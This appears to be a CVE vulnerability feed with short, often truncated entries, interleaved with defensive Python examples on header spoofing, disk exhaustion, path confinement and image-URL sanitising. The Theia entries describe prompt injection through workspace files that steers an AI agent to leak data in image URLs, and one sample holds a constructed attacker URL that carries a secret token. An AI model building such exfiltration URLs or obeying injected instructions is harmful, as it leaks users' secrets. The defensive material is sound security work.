CVE-2026-48617
CVE-2026-48617 describes a flaw in Node.js permission model enforcement that allows bypass via path misvalidation in process.report.writeReport(), potentially affecting confidentiality and integrity under affected configurations. Affected: all supported Node.js release lines (22, 24, 26). Impact ...
CVE-2025-32437
CVE-2025-32437 affects AutoGPT prior to 0.6.63, specifically the MediaDurationBlock. The issue arises because MediaDurationBlock downloads and stores videos in a temporary directory without proper deletion, and StepThroughItemsBlock can iterate MediaDurationBlock multiple times, with no limit on ...
CVE-2025-32436
CVE-2025-32436 affects AutoGPT before version 0.6.63. The AddAudioToVideoBlock may download and store video and audio in a temporary directory without cleanup until all nodes complete, and there is no limit on disk usage or automatic deletion of the intermediate video after processing. Combined w...
CVE-2025-32424
AutoGPT contains a DoS vulnerability in ScreenshotWebPageBlock prior to version 0.6.63. When a user repeatedly screenshots many pages via StepThroughItemsBlock, there is no limit on loops or on disk space usage in the current working directory, allowing disk exhaustion. Version 0.6.63 patches thi...
CVE-2026-54106
CVE-2026-54106 affects the U.S. GAO EPDS and CBCA EDS login flow, where X-Forwarded-For headers are not validated. The underlying issue allows a remote attacker who has compromised administrator credentials to bypass network access controls and log in, potentially gaining access to restricted doc...
CVE-2026-54105
CVE-2026-54105 affects the GAO EPDS and CBCA EDS systems. The update-profile/ API endpoint lets a remote, unauthenticated attacker supply an arbitrary user_id and receive a JSON response containing account-specific information, including the ...
CVE-2026-54104
The CVE-2026-54104 entry covers a privilege escalation flaw in the U.S. GAO EPDS and CBCA EDS client authentication flow. The systems trust client-provided values for the epds_role_id parameter without verification, enabling a remote, authenticated attacker to raise their privileges. Affected com...
CVE-2025-32422
AutoGPT contains a DoS vulnerability in StepThroughItemsBlock leading to disk exhaustion via unbounded downloads to FileStoreBlock. Before version 0.6.63, StepThroughItemsBlock can iterate over an arbitrary list and trigger downloads to FileStoreBlock without limiting loop count, while FileStoreB...
CVE-2026-54103
CVE-2026-54103 affects GAO EPDS and CBCA EDS, where the /update-profile/N endpoint does not require authentication for password changes, allowing a remote attacker to change an arbitrary user's password without credentials. The CVSS data indicate high...
CVE-2026-56020
CVE-2026-56020 affects the Webmin HTTP server (miniserv.pl). An unauthenticated attacker can bypass authentication by sending a forged HTTP header that impersonates any user who has an SSL client certificate configured, effectively spoofing the certificate DN to gain access. This is a network-based...
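Both the EPDS/EDS X-Forwarded-For issue and the Webmin forged-header issue share one root cause: a request header the remote peer can write is used as if a trusted proxy had set it. The following is an added example, not code from EPDS/EDS or Webmin, showing the check a backend needs: honour such headers only when the direct TCP peer is a known proxy. The proxy network, the certificate-DN header name, the admin allow-list and the requests are constructed assumptions.

```python
"""Derive the client address and any proxy-asserted identity only from a
trusted upstream, never from headers the remote peer can write.

Added example (not Webmin or EPDS/EDS code). Constructed requests below
stand in for a reverse-proxy deployment; the proxy CIDR, header names and
allow-list are assumptions for illustration.
"""
import ipaddress

# Assumed: only this proxy may set X-Forwarded-For and the cert-DN header.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]
# Assumed: identity header a TLS-terminating proxy sets from the client cert.
CERT_DN_HEADER = "x-ssl-client-dn"
ADMIN_NETWORK = ipaddress.ip_network("192.0.2.0/24")  # assumed allow-list


def _is_trusted_proxy(peer: str) -> bool:
    addr = ipaddress.ip_address(peer)
    return any(addr in net for net in TRUSTED_PROXIES)


def client_address_vulnerable(peer: str, headers: dict) -> str:
    """Weak form: believes X-Forwarded-For from anyone, the unvalidated
    pattern the EPDS/EDS advisory describes."""
    xff = headers.get("x-forwarded-for")
    return xff.split(",")[0].strip() if xff else peer


def client_address_hardened(peer: str, headers: dict) -> str:
    """Honour X-Forwarded-For only when the direct peer is a trusted proxy,
    and take the rightmost entry, which is the hop the proxy itself
    appended and observed."""
    xff = headers.get("x-forwarded-for")
    if xff and _is_trusted_proxy(peer):
        return xff.split(",")[-1].strip()
    return peer


def cert_identity_hardened(peer: str, headers: dict):
    """Accept a certificate-DN header only from the trusted proxy; a DN
    sent directly by the client is discarded (the forged-header bypass)."""
    dn = headers.get(CERT_DN_HEADER)
    if dn and _is_trusted_proxy(peer):
        return dn
    return None


def admin_login_allowed(peer: str, headers: dict) -> bool:
    """Network access control applied to the hardened client address."""
    addr = ipaddress.ip_address(client_address_hardened(peer, headers))
    return addr in ADMIN_NETWORK


# Constructed request: attacker at 198.51.100.7 connects directly to the
# backend and forges both headers.
FORGED = {"x-forwarded-for": "192.0.2.10", CERT_DN_HEADER: "CN=root"}
# Constructed request: the same forged XFF value as it arrives through the
# real proxy at 10.0.0.5, which appended the address it actually saw.
VIA_PROXY = {"x-forwarded-for": "192.0.2.10, 198.51.100.7"}

if __name__ == "__main__":
    print(client_address_vulnerable("198.51.100.7", FORGED))  # spoofed address
    print(client_address_hardened("198.51.100.7", FORGED))    # real peer
    print(cert_identity_hardened("198.51.100.7", FORGED))     # None
    print(admin_login_allowed("198.51.100.7", FORGED))        # False
    print(client_address_hardened("10.0.0.5", VIA_PROXY))     # 198.51.100.7
```

The hardened functions still depend on two deployment facts: the proxy must overwrite (not merely append to) identity headers it receives from clients, and the backend must not be reachable except through the proxy; the `TRUSTED_PROXIES` check covers the second, the proxy configuration must cover the first.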
CVE-2026-56021
CVE-2026-56021 affects Webmin. An unauthenticated attacker can read contents of any .conf file in module directories because of a bypassable regex pattern, causing information disclosure (confidentiality impact: low). The CVSS metrics place it at Medium: CVSS v3.1 base score 5.3 (NETWORK, LOW com...
CVE-2026-56022
CVE-2026-56022 affects Webmin. An attacker can bypass MFA by authenticating with HTTP basic authentication and no session cookie while supplying the header User-Agent: webmin. The advisory states "Fixed in 2.641". No exploit details...
CVE-2025-32392
AutoGPT (workflow automation platform) contains a DoS vulnerability in the LoopVideoBlock before version 0.6.63, where looping a video has no resource limits. The attacker can set an unbounded number of loops, causing an excessively large video file to be written to disk and thereby exhaust disk ...
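The AutoGPT entries above (MediaDurationBlock, AddAudioToVideoBlock, ScreenshotWebPageBlock, FileStoreBlock via StepThroughItemsBlock, LoopVideoBlock) are one failure mode: an unbounded loop drives downloads or renders into a scratch directory that has no size cap and is never cleaned up. The following is an added example, not AutoGPT code, of the two controls that close it: a per-item byte cap enforced on bytes actually read, and a per-run item cap with scratch directories removed in a finally block. The caps and the in-memory input streams are constructed for the demo.

```python
"""Download each item into its own scratch directory under a hard byte cap,
and remove the scratch directory whether or not processing succeeds.

Added example, not AutoGPT code. The source streams are constructed
in-memory objects standing in for HTTP bodies; the caps are assumptions.
"""
import io
import os
import shutil
import tempfile

MAX_BYTES_PER_ITEM = 1_000_000     # assumed per-download cap
MAX_ITEMS_PER_RUN = 50             # assumed loop-count cap
CHUNK = 64 * 1024


class DownloadTooLarge(Exception):
    pass


def download_bounded(stream, dest_path: str, limit: int = MAX_BYTES_PER_ITEM) -> int:
    """Copy stream to dest_path, aborting once more than limit bytes arrive.
    Content-Length is not consulted; the cap is enforced on bytes read."""
    written = 0
    with open(dest_path, "wb") as out:
        while True:
            # Read at most one byte past the remaining budget so that an
            # oversized stream is detected without buffering it all.
            chunk = stream.read(min(CHUNK, limit - written + 1))
            if not chunk:
                return written
            written += len(chunk)
            if written > limit:
                raise DownloadTooLarge(f"exceeded {limit} bytes")
            out.write(chunk)


def process_items(items, handler, max_items: int = MAX_ITEMS_PER_RUN):
    """Iterate items (the step-through role) under a loop cap; each item gets
    a scratch directory that is always deleted, even when handler raises."""
    if len(items) > max_items:
        raise ValueError(f"{len(items)} items exceeds cap of {max_items}")
    results = []
    for stream in items:
        scratch = tempfile.mkdtemp(prefix="media-")
        try:
            path = os.path.join(scratch, "input.bin")
            size = download_bounded(stream, path)
            results.append(handler(path, size))
        finally:
            shutil.rmtree(scratch, ignore_errors=True)  # cleanup on every path
    return results


def demo_oversized_is_rejected() -> bool:
    """A stream one byte over the cap is refused and its scratch dir removed."""
    big = io.BytesIO(b"\x00" * (MAX_BYTES_PER_ITEM + 1))
    scratch = tempfile.mkdtemp(prefix="media-")
    try:
        download_bounded(big, os.path.join(scratch, "x"))
        return False
    except DownloadTooLarge:
        return True
    finally:
        shutil.rmtree(scratch, ignore_errors=True)


def demo_exact_limit_accepted() -> int:
    """A stream of exactly the cap is accepted in full."""
    return process_items([io.BytesIO(b"\x00" * MAX_BYTES_PER_ITEM)],
                         lambda path, size: size)[0]


def demo_scratch_is_cleaned() -> bool:
    """Scratch directories seen by the handler no longer exist afterwards."""
    seen = []

    def handler(path, size):
        seen.append(os.path.dirname(path))
        return size

    sizes = process_items([io.BytesIO(b"a" * 10), io.BytesIO(b"b" * 20)], handler)
    return sizes == [10, 20] and not any(os.path.exists(d) for d in seen)


def demo_loop_cap_enforced() -> bool:
    """One item over the per-run cap is rejected before any download starts."""
    try:
        process_items([io.BytesIO(b"")] * (MAX_ITEMS_PER_RUN + 1), lambda p, s: s)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(demo_oversized_is_rejected(), demo_exact_limit_accepted(),
          demo_scratch_is_cleaned(), demo_loop_cap_enforced())
```

The per-item cap alone is not enough: fifty loops of a capped download still fill a disk if intermediates persist, which is why the scratch directory is deleted per item rather than when the whole run completes.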
CVE-2026-55204
CVE-2026-55204 affects HAProxy up to version 3.4.0. It describes a NULL pointer dereference in hpack_dht_insert() (src/hpack-tbl.c), which fails to check the return value of hpack_dht_defrag() when the memory pool is exhausted. Under memory pressure, HPACK dynamic table ins...
CVE-2026-55203
HAProxy
CVE-2026-55205
Hermes WebUI prior to 0.51.468 is affected by a resource-exhaustion vulnerability in the unauthenticated POST /api/onboarding/oauth/start endpoint. The issue allows unbounded accumulation of in-memory flow state and daemon threads, enabling repeated or concurrent requests to exhaust server memory...
CVE-2026-56024
CVE-2026-56024 concerns the WordPress WP EasyPay plugin, affected versions
CVE-2026-55170
Technical details for CVE-2026-55170 are not publicly available in the provided documents; monitoring for updates is advised.
CVE-2026-55093
Technical details for CVE-2026-55093 are not publicly available in the provided documents; the entry is placeholder/reserved. Monitor for updates.
CVE-2026-54711
Technical details for CVE-2026-54711 are not provided in the supplied documents. No affected products, impact, or remediation are disclosed. Monitor for updates from the submitting organization.
CVE-2026-54695
Technical details for CVE-2026-54695 are not publicly available in the provided documents. Monitor for updates as information is not yet disclosed.
CVE-2026-55701
Technical details are not publicly available in the provided documents. Monitor for updates as more information becomes available.
CVE-2026-54005
Technical details for CVE-2026-54005 are not publicly available in the provided documents. The entry is reserved; monitor for updates.
CVE-2026-54004
Technical details for CVE-2026-54004 are not publicly available in the provided documents. Monitor for updates as information may be released by the reserving party.
CVE-2026-54003
Technical details for CVE-2026-54003 are not publicly available in the provided documents. Monitor for updates from the reporting organization and associated advisories.
CVE-2026-54002
Technical details for CVE-2026-54002 are not publicly available in the provided documents. No affected products, vectors, or fixes are disclosed. Monitor for updates and new information as it is published.
CVE-2026-50188
Technical details for CVE-2026-50188 are not publicly available in the provided documents. Monitor for updates.
CVE-2026-49276
Technical details for CVE-2026-49276 are not publicly available in the provided documents. Monitor for updates.
CVE-2026-56008
A privilege escalation vulnerability affects the WordPress Fusion Builder plugin, versions <= 3.15.4, as reported by Patchstack and credited to daroo. The provided connected document does not specify the underlyin...
CVE-2026-49274
Technical details for CVE-2026-49274 are not publicly available in the provided documents. This CVE entry appears reserved; monitor for updates as new details are published.
CVE-2026-47256
Technical details for CVE-2026-47256 are not publicly available in the provided documents. Monitor for updates and posted details.
CVE-2026-11791
CVE-2026-11791 concerns 389 Directory Server (389-ds-base): during schema reload, attr_syntax_swap_ht() unconditionally frees attribute syntax information nodes, bypassing the refcount-based deferred deletion. This can lead to a use-after-free or double-free when an LDAP query ...
CVE-2026-56006
CVE-2026-56006: the connected document identifies a reflected cross-site scripting (XSS) vulnerability in the WordPress H5P plugin, versions
CVE-2026-44691
CVE-2026-44691 affects Eclipse Theia versions before 1.69.0. The issue arises when custom task definitions in workspace files (e.g., .theia/tasks.json, .vscode/tasks.json) can be executed without workspace trust, potentially enabling arbitrary commands to run with the user’s privileges if a malic...
CVE-2026-54847
CVE-2026-54847 concerns the WordPress plugin Stylish Cost Calculator, affected in versions
CVE-2026-22551
Eclipse Theia versions before 1.71.0 are affected: the AI chat could render Markdown image tags from AI responses, causing HTTP requests to arbitrary external URLs. In combination with a malicious workspace via prompt injection, an attacker could coax the AI agent to construct image URLs that lea...
CVE-2025-58175
CVE-2025-58175 affects GeoServer prior to 2.26.4 and 2.27.3. When GeoServer is configured to use a proxy base URL and ENTITY_RESOLUTION_ALLOWLIST, an unauthenticated Server-Side Request Forgery (SSRF) can be triggered. The issue only affects installations where the proxy base URL lacks a URL path...
CVE-2026-55885
Technical details for CVE-2026-55885 are not publicly available in the provided documents. Monitor for updates.
CVE-2026-54849
WordPress plugin Premmerce Wishlist for WooCommerce (versions
CVE-2025-52465
GeoServer has an arbitrary file write vulnerability (CVE-2025-52465) in the Master Password Dump page. Before versions 2.26.4 and 2.27.3, an authenticated administrator with access to GeoServer’s security system can pass an absolute path as the target file name to the Master Password Dump page, c...
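The GeoServer Master Password Dump issue is a missing path-confinement check: a target file name is accepted as given, so an absolute path lands outside the intended directory. The same class of check is what the Node.js permission model (CVE-2026-48617 above) has to get right for process.report.writeReport(). The following is an added example, not GeoServer or Node.js code, of the confinement check a "write to named file" feature needs, covering absolute names, `..` traversal and symlinks that resolve outside the base directory. The base directory and file names are constructed for the demo.

```python
"""Confine a user-supplied target file name to a designated directory.

Added example, not GeoServer or Node.js code. The check resolves the final
path (following symlinks) and requires it to remain under the base
directory; base directory and sample names are constructed for the demo.
"""
import os
import tempfile


def confine(base_dir: str, user_name: str) -> str:
    """Return an absolute path under base_dir for user_name, or raise
    PermissionError. Absolute names are rejected outright (os.path.join
    would otherwise discard base_dir); '..' and symlink escapes are caught
    because the comparison is made on the fully resolved path."""
    if os.path.isabs(user_name):
        raise PermissionError(f"absolute target {user_name!r} not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_name))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"{user_name!r} escapes {base_dir}")
    return candidate


def write_dump(base_dir: str, user_name: str, data: bytes) -> str:
    """The dump operation, performed only on a confined path."""
    target = confine(base_dir, user_name)
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "wb") as fh:
        fh.write(data)
    return target


def demo() -> dict:
    """Map each constructed target name to the relative path it was confined
    to, or 'rejected'."""
    base = tempfile.mkdtemp(prefix="dump-")
    results = {}
    for name in ["report.txt", "sub/report.txt", "../escape.txt", "/etc/passwd"]:
        try:
            rel = os.path.relpath(write_dump(base, name, b"dump"), base)
            results[name] = rel.replace(os.sep, "/")
        except PermissionError:
            results[name] = "rejected"
    return results


def demo_symlink() -> str:
    """A symlink inside base_dir that points outside it is resolved before
    the containment check, so writing through it is refused."""
    base = tempfile.mkdtemp(prefix="dump-")
    outside = tempfile.mkdtemp(prefix="outside-")
    os.symlink(outside, os.path.join(base, "link"))
    try:
        write_dump(base, "link/report.txt", b"dump")
        return "allowed"
    except PermissionError:
        return "rejected"


if __name__ == "__main__":
    print(demo())          # {'report.txt': 'report.txt', 'sub/report.txt': 'sub/report.txt', '../escape.txt': 'rejected', '/etc/passwd': 'rejected'}
    print(demo_symlink())  # rejected
```

A prefix comparison on the raw string (`candidate.startswith(base)`) is the common wrong version: it passes `base_dir` + `"-other/file"` and does not see through symlinks. `commonpath` on realpath output avoids both.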
CVE-2026-55686
Technical details for CVE-2026-55686 are not publicly available in the provided documents. Monitor for updates as information about affected products, impact, and fixes may be released later.
CVE-2026-46580
Theia before v1.71.0 loads files matching .prompts/*.prompttemplate from a workspace, allowing attacker-controlled content to override the AI agent’s system prompts (indirect prompt injection). This enables attack chains with untrusted workspaces, potentially causing data exfiltration via Markdow...
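CVE-2026-46580 and CVE-2026-22551 above form a chain: a workspace file steers the agent's instructions, and the rendered chat then fetches an image URL the agent was steered into constructing, carrying data in the URL. The render step is where that exfiltration can be cut off regardless of how the prompt was compromised. The following is an added example, not Theia code, that rewrites markdown image syntax and raw `<img>` tags in model output so that only data: URIs and an allow-listed host are ever fetched. The allow-listed host and the sample chat output are constructed.

```python
"""Refuse to render remote image references found in model output.

Added example, not Theia code. Markdown image syntax and raw <img> tags are
rewritten so the renderer never fetches a URL chosen by the model (or by a
prompt-injected workspace file); the allow-list host is an assumption.
"""
import re
from urllib.parse import urlparse

# Assumed: the only remote host the UI is permitted to load images from.
ALLOWED_IMAGE_HOSTS = {"assets.example.invalid"}

MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")
HTML_IMG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
SRC_ATTR = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def _url_allowed(url: str) -> bool:
    """Inline data: URIs make no request; anything else must be https to an
    allow-listed host. Relative URLs and http are refused."""
    p = urlparse(url)
    if p.scheme == "data":
        return True
    return p.scheme == "https" and p.hostname in ALLOWED_IMAGE_HOSTS


def sanitize_model_markdown(text: str):
    """Return (rendered_text, blocked_urls). Disallowed images become a
    visible placeholder that keeps the alt text and drops the URL."""
    blocked = []

    def md_sub(m):
        alt, url = m.group(1), m.group(2)
        if _url_allowed(url):
            return m.group(0)
        blocked.append(url)
        return f"[image blocked: {alt or 'no alt text'}]"

    def html_sub(m):
        # Raw <img> tags are never needed in chat output; block all of them.
        src = SRC_ATTR.search(m.group(0))
        blocked.append(src.group(1) if src else m.group(0))
        return "[image blocked]"

    text = MD_IMAGE.sub(md_sub, text)
    text = HTML_IMG.sub(html_sub, text)
    return text, blocked


# Constructed model output: one legitimate image, one markdown image whose
# query string carries data lifted from the workspace, and one raw <img>.
SAMPLE = (
    "Here is the summary you asked for.\n"
    "![status](https://assets.example.invalid/ok.png)\n"
    "![done](https://attacker.invalid/c?d=SECRET_TOKEN_FROM_WORKSPACE)\n"
    '<img src="http://attacker.invalid/p?x=1">\n'
)


def demo():
    return sanitize_model_markdown(SAMPLE)


if __name__ == "__main__":
    rendered, blocked = demo()
    print(rendered)
    print("blocked:", blocked)
```

Blocking at render time does not remove the prompt-injection root cause (untrusted workspace files still reach the agent), but it removes the agent's ability to turn a hijacked instruction into an outbound request, and the `blocked` list is a useful signal to log.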
CVE-2025-27511
CVE-2025-27511 affects the GeoServer DB2 DataStore Extension. According to the connected advisories, prior to version 2.27.0, an authenticated administrator could perform a JNDI attack via a specially crafted DB2 JDBC URL, leading to Remote Code Execution (RCE). The issue is the JNDI injection vu...
CVE-2026-44688
The vulnerability CVE-2026-44688 affects Eclipse Theia versions prior to 1.71.0. The AI chat agent processes workspace file and directory names as part of its prompt context without distinguishing them from system instructions, enabling indirect prompt injection when an attacker uses adversarial ...
CVE-2026-54848
CVE-2026-54848 concerns a vulnerability in the WordPress plugin APIExperts Square for WooCommerce, version
CVE-2026-54846
CVE-2026-54846 is backed by a PatchStack report describing a Broken Access Control vulnerability in the WordPress plugin Syncee Premium Dropshipping & Wholesale (versions
CVE-2026-54845
WordPress MDTF plugin
CVE-2026-50141
CVE-2026-50141 affects Woodpecker CI prior to 3.14.1, where the gRPC layer allowed an authenticated agent to impersonate another by forging agent_id in outgoing metadata. The server verified the JWT but then ignored it in favor of the client-supplied agent_id, enabling cross-tenant impersonation....
CVE-2026-9158
In Eclipse 4diac FORTE, versions 3.0.0 to 3.1.0 are affected by a vulnerability where a specially crafted DELETE command to the management interface can trigger a dangling pointer, allowing subsequent commands to access freed memory (use-after-free). This is the concrete issue described across co...
CVE-2026-56012
CVE-2026-56012 concerns the WordPress plugin Media Library Assistant (vulnerable from an unknown version through 3.35): an SQL injection caused by improper neutralization of special elements in SQL commands, exploitable as blind SQL injection. The affected component is the plugin's data handling for user input in ...